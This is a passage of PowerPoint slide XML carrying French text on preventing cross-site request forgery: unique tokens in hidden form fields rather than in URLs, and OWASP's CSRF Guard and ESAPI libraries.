                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilisateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meilleure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> option  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’inclure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jeton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> unique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> un champ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>caché</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jeton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>envoyé</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> le corps de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requête</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTTP, et non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inséré</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, sera </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ainsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>potentiellement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>moins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> exposé.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jeton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> unique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>peut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aussi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>être</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inclus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>directement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>paramètre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mais</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>il</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>risque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> d’être accessible à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’attaquant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ainsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> d’être </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compromis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>projet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t> Guard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fournit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bibliothèques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insérer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jetons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les applications  Java EE, .NET, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.  Et le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>projet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fournit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des interfaces </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>programmation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>développeurs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>peuvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utiliser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pour </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>empêcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attaques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
